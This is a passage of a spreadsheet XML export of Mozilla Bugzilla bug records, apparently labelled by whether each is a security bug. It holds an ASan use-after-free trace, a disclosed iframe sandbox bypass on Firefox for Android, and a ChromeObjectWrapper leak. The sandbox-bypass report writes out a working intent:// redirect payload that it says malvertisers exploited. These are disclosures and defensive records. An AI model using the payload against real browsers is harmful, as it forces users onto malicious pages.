        #15 0x7fe791ec98d6 in mozilla::dom::(anonymous namespace)::ScriptExecutorRunnable::WorkerRun(JSContext*, mozilla::dom::WorkerPrivate*) /builds/worker/workspace/build/src/dom/workers/ScriptLoader.cpp:1989:10
        #16 0x7fe791f09842 in mozilla::dom::WorkerRunnable::Run() /builds/worker/workspace/build/src/dom/workers/WorkerRunnable.cpp:363:12
        #17 0x7fe78a2b22c1 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1180:14
        #18 0x7fe78a2b83d8 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
        #19 0x7fe791ef859e in mozilla::dom::WorkerPrivate::RunCurrentSyncLoop() /builds/worker/workspace/build/src/dom/workers/WorkerPrivate.cpp:3646:7
        #20 0x7fe791e9a7b5 in Run /builds/worker/workspace/build/src/dom/workers/WorkerPrivate.h:1173:27
        #21 0x7fe791e9a7b5 in mozilla::dom::(anonymous namespace)::LoadAllScripts(mozilla::dom::WorkerPrivate*, nsTArray&lt;mozilla::dom::(anonymous namespace)::ScriptLoadInfo&gt;&amp;, bool, mozilla::dom::WorkerScriptType, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/workers/ScriptLoader.cpp:2149
        #22 0x7fe791e99bd2 in mozilla::dom::workerinternals::LoadMainScript(mozilla::dom::WorkerPrivate*, nsTSubstring&lt;char16_t&gt; const&amp;, mozilla::dom::WorkerScriptType, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/workers/ScriptLoader.cpp:2259:3
        #23 0x7fe791f1ca85 in mozilla::dom::(anonymous namespace)::CompileScriptRunnable::WorkerRun(JSContext*, mozilla::dom::WorkerPrivate*) /builds/worker/workspace/build/src/dom/workers/WorkerPrivate.cpp:340:5
        #24 0x7fe791f09842 in mozilla::dom::WorkerRunnable::Run() /builds/worker/workspace/build/src/dom/workers/WorkerRunnable.cpp:363:12
        #25 0x7fe78a2b22c1 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1180:14
        #26 0x7fe78a2b83d8 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
        #27 0x7fe791eefd3a in mozilla::dom::WorkerPrivate::DoRunLoop(JSContext*) /builds/worker/workspace/build/src/dom/workers/WorkerPrivate.cpp:2748:7
        #28 0x7fe791eb82cb in mozilla::dom::workerinternals::(anonymous namespace)::WorkerThreadPrimaryRunnable::Run() /builds/worker/workspace/build/src/dom/workers/RuntimeService.cpp:2305:40
        #29 0x7fe78a2b22c1 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1180:14
        #30 0x7fe78a2b83d8 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
        #31 0x7fe78b2f8eb0 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:333:5
        #32 0x7fe78b227fd2 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
        #33 0x7fe78b227fd2 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
        #34 0x7fe78b227fd2 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
        #35 0x7fe78a2ac21a in nsThread::ThreadFunc(void*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:454:11
    Thread T22 (DOM Worker) created by T0 (Web Content) here:
        #0 0x5604aa49aadd in pthread_create /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:210:3
        #1 0x7fe7ab04b158 in _PR_CreateThread /builds/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:433:14
        #2 0x7fe7ab034d3e in PR_CreateThread /builds/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:518:12
        #3 0x7fe78a2ae529 in nsThread::Init(nsTSubstring&lt;char&gt; const&amp;) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:661:8
        #4 0x7fe791f18c48 in mozilla::dom::WorkerThread::Create(mozilla::dom::WorkerThreadFriendKey const&amp;) /builds/worker/workspace/build/src/dom/workers/WorkerThread.cpp:93:7
        #5 0x7fe791e8d1d9 in mozilla::dom::workerinternals::RuntimeService::ScheduleWorker(mozilla::dom::WorkerPrivate*) /builds/worker/workspace/build/src/dom/workers/RuntimeService.cpp:1433:14
        #6 0x7fe791e8b7f5 in mozilla::dom::workerinternals::RuntimeService::RegisterWorker(mozilla::dom::WorkerPrivate*) /builds/worker/workspace/build/src/dom/workers/RuntimeService.cpp:1298:19
        #7 0x7fe791ee9d49 in mozilla::dom::WorkerPrivate::Constructor(JSContext*, nsTSubstring&lt;char16_t&gt; const&amp;, bool, mozilla::dom::WorkerType, nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char&gt; const&amp;, mozilla::dom::WorkerLoadInfo*, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/workers/WorkerPrivate.cpp:2250:24
        #8 0x7fe791e9ba17 in mozilla::dom::Worker::Constructor(mozilla::dom::GlobalObject const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, mozilla::dom::WorkerOptions const&amp;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/workers/Worker.cpp:30:41
        #9 0x7fe78f4ae630 in mozilla::dom::Worker_Binding::_constructor(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/WorkerBinding.cpp:1112:52
        #10 0x7fe796569595 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:442:13
        #11 0x7fe796569595 in CallJSNativeConstructor /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:458
        #12 0x7fe796569595 in InternalConstruct(JSContext*, js::AnyConstructArgs const&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:651
        #13 0x7fe796546916 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3070:16
        #14 0x7fe796530528 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:422:10
        #15 0x7fe79656bb7c in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::AbstractFramePtr, JS::Value*) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:781:13
        #16 0x7fe79656c329 in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:814:10
        #17 0x7fe7967ea5ca in ExecuteScript(JSContext*, JS::Handle&lt;JS::StackGCVector&lt;JSObject*, js::TempAllocPolicy&gt; &gt;, JS::Handle&lt;JSScript*&gt;, JS::Value*) /builds/worker/workspace/build/src/js/src/vm/CompilationAndEvaluation.cpp:455:10
        #18 0x7fe78dab2254 in nsJSUtils::ExecutionContext::ExecScript() /builds/worker/workspace/build/src/dom/base/nsJSUtils.cpp:386:8
        #19 0x7fe792360e33 in mozilla::dom::ExecuteCompiledScript(JSContext*, mozilla::dom::ScriptLoadRequest*, nsJSUtils::ExecutionContext&amp;) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:2495:16
        #20 0x7fe79235def1 in mozilla::dom::ScriptLoader::EvaluateScript(mozilla::dom::ScriptLoadRequest*) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:2715:20
        #21 0x7fe79235688c in mozilla::dom::ScriptLoader::ProcessRequest(mozilla::dom::ScriptLoadRequest*) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:2222:10
        #22 0x7fe792353262 in mozilla::dom::ScriptLoader::ProcessInlineScript(nsIScriptElement*, mozilla::dom::ScriptKind) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:1803:10
        #23 0x7fe79232d67e in mozilla::dom::ScriptLoader::ProcessScriptElement(nsIScriptElement*) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:1526:10
        #24 0x7fe79232c94e in mozilla::dom::ScriptElement::MaybeProcessScript() /builds/worker/workspace/build/src/dom/script/ScriptElement.cpp:118:18
        #25 0x7fe78c6218fa in AttemptToExecute /builds/worker/workspace/build/src/obj-firefox/dist/include/nsIScriptElement.h:224:18
        #26 0x7fe78c6218fa in nsHtml5TreeOpExecutor::RunScript(nsIContent*) /builds/worker/workspace/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:727
        #27 0x7fe78c61b5a3 in nsHtml5TreeOpExecutor::RunFlushLoop() /builds/worker/workspace/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:530:7
        #28 0x7fe78c627720 in nsHtml5ExecutorFlusher::Run() /builds/worker/workspace/build/src/parser/html/nsHtml5StreamParser.cpp:133:18
        #29 0x7fe78a2811f1 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:295:32
        #30 0x7fe78a2b22c1 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1180:14
        #31 0x7fe78a2b83d8 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
        #32 0x7fe78b2f7caa in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:88:21
        #33 0x7fe78b227fd2 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
        #34 0x7fe78b227fd2 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
        #35 0x7fe78b227fd2 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
        #36 0x7fe7926bf749 in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:137:27
        #37 0x7fe7962dd4df in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:919:20
        #38 0x7fe78b227fd2 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
        #39 0x7fe78b227fd2 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
        #40 0x7fe78b227fd2 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
        #41 0x7fe7962dce86 in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:757:34
        #42 0x5604aa4e53a7 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:56:28
        #43 0x5604aa4e53a7 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:263
        #44 0x7fe7a9c4282f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
    SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/dom/workers/WorkerPrivate.h:188:15 in SetDebugger
    Shadow bytes around the buggy address:
      0x0c36800275f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c3680027600: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c3680027610: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c3680027620: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c3680027630: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
    =&gt;0x0c3680027640: fd fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c3680027650: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c3680027660: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c3680027670: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c3680027680: fd fd fd fd fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c368002769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3247==ABORTING</t>
        </is>
      </c>
      <c r="X223" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="224">
      <c r="A224" t="n">
        <v>1584582</v>
      </c>
      <c r="B224" t="inlineStr">
        <is>
          <t>2019-09-27 10:38:39 -0700</t>
        </is>
      </c>
      <c r="C224" t="inlineStr">
        <is>
          <t>iframe sandboxing bypass on Android via intent: url scheme</t>
        </is>
      </c>
      <c r="D224" t="inlineStr">
        <is>
          <t>2024-05-30 10:03:19 -0700</t>
        </is>
      </c>
      <c r="E224" t="n">
        <v>1</v>
      </c>
      <c r="F224" t="n">
        <v>1</v>
      </c>
      <c r="G224" t="n">
        <v>2</v>
      </c>
      <c r="H224" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I224" t="inlineStr">
        <is>
          <t>Fenix</t>
        </is>
      </c>
      <c r="J224" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K224" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L224" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M224" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N224" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O224" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P224" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?] [fennec68.3?][post-critsmash-triage][adv-main85+]</t>
        </is>
      </c>
      <c r="Q224" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R224" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S224" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T224" t="n">
        <v>1</v>
      </c>
      <c r="U224" t="n">
        <v>0</v>
      </c>
      <c r="V224" t="n">
        <v>30</v>
      </c>
      <c r="W224" t="inlineStr">
        <is>
          <t>Hi Team,
This bug is actively being exploited by a prolific malvertiser known as Zirconium in order to serve millions of forced mobile redirections via  malicious ad campaigns.
Here's a reference for more information about Zirconium:
https://blog.confiant.com/uncovering-2017s-largest-malvertising-operation-b84cd38d6b85
The bug:
Consider an iframe with the following sandboxing attributes:
"allow-forms allow-pointer-lock allow-popups-to-escape-sandbox allow-popups allow-same-origin allow-scripts allow-top-navigation-by-user-activation" 
These are standard sandbox attributes for ad serving, and they're generally meant to mitigate things like forced redirections that are uninitiated. Especially the "allow-top-navigation-by-user-activation" attribute.
Most browsers will block something like this in such an iframe:
top.location.href="http://malicious_landing_page";
Firefox on Android will prevent this redirection as well. However, it will not prevent spawning a redirect that's done in this manner:
location.href = "intent://malicious_landing_page/#Intent;scheme=https;package=com.android.chrome;end";
This payload will spawn Google Chrome from Firefox and open the malicious page without any user interaction. It will also spawn if the allow-popups attribute isn't present. All other major browser successfully prevent this.
This is currently being heavily abused in an ongoing malvertising campaign which is specifically targeting Firefox on Android. We strongly recommend that this be addressed with some  urgency as that will have a direct impact on the malvertiser's financial success with this campaign.
This has been tested in the latest Firefox on Android 9 - Samsung Galaxy S8+ as well as several Browserstack instances.
Happy to answer any questions you might have.
Best,
Eliya</t>
        </is>
      </c>
      <c r="X224" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="225">
      <c r="A225" t="n">
        <v>521706</v>
      </c>
      <c r="B225" t="inlineStr">
        <is>
          <t>2009-10-11 20:43:41 -0700</t>
        </is>
      </c>
      <c r="C225" t="inlineStr">
        <is>
          <t>Add last modified date to footer where the current 'Page History' link is</t>
        </is>
      </c>
      <c r="D225" t="inlineStr">
        <is>
          <t>2012-08-23 00:16:07 -0700</t>
        </is>
      </c>
      <c r="E225" t="n">
        <v>1</v>
      </c>
      <c r="F225" t="n">
        <v>1</v>
      </c>
      <c r="G225" t="n">
        <v>5</v>
      </c>
      <c r="H225" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I225" t="inlineStr">
        <is>
          <t>www.mozilla.org</t>
        </is>
      </c>
      <c r="J225" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K225" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L225" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M225" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N225" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O225" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P225" t="inlineStr"/>
      <c r="Q225" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R225" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S225" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T225" t="n">
        <v>1</v>
      </c>
      <c r="U225" t="n">
        <v>0</v>
      </c>
      <c r="V225" t="n">
        <v>17</v>
      </c>
      <c r="W225" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)
Add last modified date to footer where the current 'Page History' link is.
Reproducible: Always</t>
        </is>
      </c>
      <c r="X225" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="226">
      <c r="A226" t="n">
        <v>430737</v>
      </c>
      <c r="B226" t="inlineStr">
        <is>
          <t>2008-04-24 15:27:32 -0700</t>
        </is>
      </c>
      <c r="C226" t="inlineStr">
        <is>
          <t>Update snippets sometimes don't propagate to the entire cluster</t>
        </is>
      </c>
      <c r="D226" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E226" t="n">
        <v>1</v>
      </c>
      <c r="F226" t="n">
        <v>1</v>
      </c>
      <c r="G226" t="n">
        <v>5</v>
      </c>
      <c r="H226" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I226" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J226" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K226" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L226" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M226" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N226" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O226" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P226" t="inlineStr">
        <is>
          <t>Waiting on a release to test</t>
        </is>
      </c>
      <c r="Q226" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R226" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S226" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T226" t="n">
        <v>1</v>
      </c>
      <c r="U226" t="n">
        <v>0</v>
      </c>
      <c r="V226" t="n">
        <v>32</v>
      </c>
      <c r="W226" t="inlineStr">
        <is>
          <t>For the past three releases (Firefox 2.0.0.14 beta, Firefox 2.0.0.14, and now Thunderbird 2.0.0.14 beta), we've had an issue where after pushing update snippets don't appear immediately.
oremj and justdave looked at the servers during the last two releases and it was discovered that some of the servers behind the AUS URL didn't have the update snippets at all. We confirmed that throttling was not on.
From a "real world" perspective, this means that some users will receive updates while others, even when they force the check, won't receive an update at all.
This is a blocker for releasing Thunderbird 2.0.0.14 next week.</t>
        </is>
      </c>
      <c r="X226" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="227">
      <c r="A227" t="n">
        <v>780370</v>
      </c>
      <c r="B227" t="inlineStr">
        <is>
          <t>2012-08-04 02:42:50 -0700</t>
        </is>
      </c>
      <c r="C227" t="inlineStr">
        <is>
          <t>ChromeObjectWrapper is not implemented as intended</t>
        </is>
      </c>
      <c r="D227" t="inlineStr">
        <is>
          <t>2014-01-10 10:40:39 -0800</t>
        </is>
      </c>
      <c r="E227" t="n">
        <v>1</v>
      </c>
      <c r="F227" t="n">
        <v>1</v>
      </c>
      <c r="G227" t="n">
        <v>3</v>
      </c>
      <c r="H227" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I227" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J227" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K227" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L227" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M227" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N227" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O227" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P227" t="inlineStr">
        <is>
          <t>[advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q227" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R227" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S227" t="inlineStr">
        <is>
          <t>mozilla17</t>
        </is>
      </c>
      <c r="T227" t="n">
        <v>1</v>
      </c>
      <c r="U227" t="n">
        <v>0</v>
      </c>
      <c r="V227" t="n">
        <v>20</v>
      </c>
      <c r="W227" t="inlineStr">
        <is>
          <t>After bug 760109 landing, content still can access properties of a standard prototype from a chrome scope if __exposedProps__ doesn't exist.
67 ChromeObjectWrapper::get(JSContext *cx, JSObject *wrapper, JSObject *receiver,
68                          jsid id, js::Value *vp)
69 {
70     // Try the lookup on the base wrapper.
71     if (!ChromeObjectWrapperBase::get(cx, wrapper, receiver, id, vp))
72         return false;
73 
74     // If we found something or have no proto, we're done.
75     JSObject *wrapperProto = JS_GetPrototype(wrapper);
76     if (!vp-&gt;isUndefined() || !wrapperProto)
77         return true;
ChromeObjectWrapperBase::get lookups the chrome object's prototype chain and can find something on a standard prototype from the chrome scope.</t>
        </is>
      </c>
      <c r="X227" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="228">
      <c r="A228" t="n">
        <v>74562</v>
      </c>
      <c r="B228" t="inlineStr">
        <is>
          <t>2001-04-03 11:09:48 -0700</t>
        </is>
      </c>
      <c r="C228" t="inlineStr">
        <is>
          <t>QA stat finds bugs in wrong tests</t>
        </is>
      </c>
      <c r="D228" t="inlineStr">
        <is>
          <t>2001-06-29 15:59:14 -0700</t>
        </is>
      </c>
      <c r="E228" t="n">
        <v>1</v>
      </c>
      <c r="F228" t="n">
        <v>1</v>
      </c>
      <c r="G228" t="n">
        <v>3</v>
      </c>
      <c r="H228" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I228" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J228" t="inlineStr">
        <is>
          <t>Test</t>
        </is>
      </c>
      <c r="K228" t="inlineStr">
        <is>
          <t>3.2</t>
        </is>
      </c>
      <c r="L228" t="inlineStr">
        <is>
          <t>Sun</t>
        </is>
      </c>
      <c r="M228" t="inlineStr">
        <is>
          <t>Solaris</t>
        </is>
      </c>
      <c r="N228" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O228" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P228" t="inlineStr"/>
      <c r="Q228" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R228" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S228" t="inlineStr">
        <is>
          <t>3.3</t>
        </is>
      </c>
      <c r="T228" t="n">
        <v>1</v>
      </c>
      <c r="U228" t="n">
        <v>0</v>
      </c>
      <c r="V228" t="n">
        <v>4</v>
      </c>
      <c r="W228" t="inlineStr">
        <is>
          <t>There were lots of failures on charm.9 thru charm.12, but charm.1 was reported
failing as well</t>
        </is>
      </c>
      <c r="X228" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="229">
      <c r="A229" t="n">
        <v>827687</v>
      </c>
      <c r="B229" t="inlineStr">
        <is>
          <t>2013-01-07 20:09:29 -0800</t>
        </is>
      </c>
      <c r="C229" t="inlineStr">
        <is>
          <t>Out of bounds read [@ ElementAnimations::EnsureStyleRuleFor] with CSS animation</t>
        </is>
      </c>
      <c r="D229" t="inlineStr">
        <is>
          <t>2014-11-19 19:35:55 -0800</t>
        </is>
      </c>
      <c r="E229" t="n">
        <v>1</v>
      </c>
      <c r="F229" t="n">
        <v>1</v>
      </c>
      <c r="G229" t="n">
        <v>3</v>
      </c>
      <c r="H229" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I229" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J229" t="inlineStr">
        <is>
          <t>CSS Parsing and Computation</t>
        </is>
      </c>
      <c r="K229" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L229" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M229" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N229" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O229" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P229" t="inlineStr">
        <is>
          <t>[asan][adv-main19+]</t>
        </is>
      </c>
      <c r="Q229" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R229" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S229" t="inlineStr">
        <is>
          <t>mozilla21</t>
        </is>
      </c>
      <c r="T229" t="n">
        <v>1</v>
      </c>
      <c r="U229" t="n">
        <v>0</v>
      </c>
      <c r="V229" t="n">
        <v>26</v>
      </c>
      <c r="W229" t="inlineStr">
        <is>
          <t>Created attachment 699002
testcase (may crash)
* In a non-debug ASan build, this appears as a heap buffer overflow 
[@ ElementAnimations::EnsureStyleRuleFor] (same signature as fixed bug 765218).
* In a non-ASan build, this crashes infrequently.
  * But adding onload-reload to the testcase makes it reliable enough:
    * bp-3a3f345f-bed8-46b1-a008-ee44f2130108
    * bp-cda868fb-6a82-4e77-86c9-3944a2130108
* In a debug build, the crash is masked by the abort in bug 662724:
###!!! ABORT: position should be in [0-1]: '0.0 &lt;= positionInIteration &amp;&amp; positionInIteration &lt;= 1.0', file layout/style/nsAnimationManager.cpp, line 235</t>
        </is>
      </c>
      <c r="X229" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="230">
      <c r="A230" t="n">
        <v>21745</v>
      </c>
      <c r="B230" t="inlineStr">
        <is>
          <t>1999-12-14 14:51:19 -0800</t>
        </is>
      </c>
      <c r="C230" t="inlineStr">
        <is>
          <t>[bugday] bugzilla query page needs a field for actual bug number</t>
        </is>
      </c>
      <c r="D230" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:20 -0800</t>
        </is>
      </c>
      <c r="E230" t="n">
        <v>1</v>
      </c>
      <c r="F230" t="n">
        <v>1</v>
      </c>
      <c r="G230" t="n">
        <v>4</v>
      </c>
      <c r="H230" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I230" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J230" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K230" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L230" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M230" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="N230" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O230" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P230" t="inlineStr"/>
      <c r="Q230" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R230" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S230" t="inlineStr">
        <is>
          <t>Bugzilla old</t>
        </is>
      </c>
      <c r="T230" t="n">
        <v>1</v>
      </c>
      <c r="U230" t="n">
        <v>0</v>
      </c>
      <c r="V230" t="n">
        <v>4</v>
      </c>
      <c r="W230" t="inlineStr">
        <is>
          <t>It would be a time saver if there was a field at the very top or bottom of the
query page that said "If you already know the bug # type it here:" or something
like that.  I know this is available on the main Bugzilla page but it would save
time if it was also available on the query page.</t>
        </is>
      </c>
      <c r="X230" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="231">
      <c r="A231" t="n">
        <v>1432856</v>
      </c>
      <c r="B231" t="inlineStr">
        <is>
          <t>2018-01-24 09:57:06 -0800</t>
        </is>
      </c>
      <c r="C231" t="inlineStr">
        <is>
          <t>Popup window can cover fullscreen security UI</t>
        </is>
      </c>
      <c r="D231" t="inlineStr">
        <is>
          <t>2021-06-02 02:18:46 -0700</t>
        </is>
      </c>
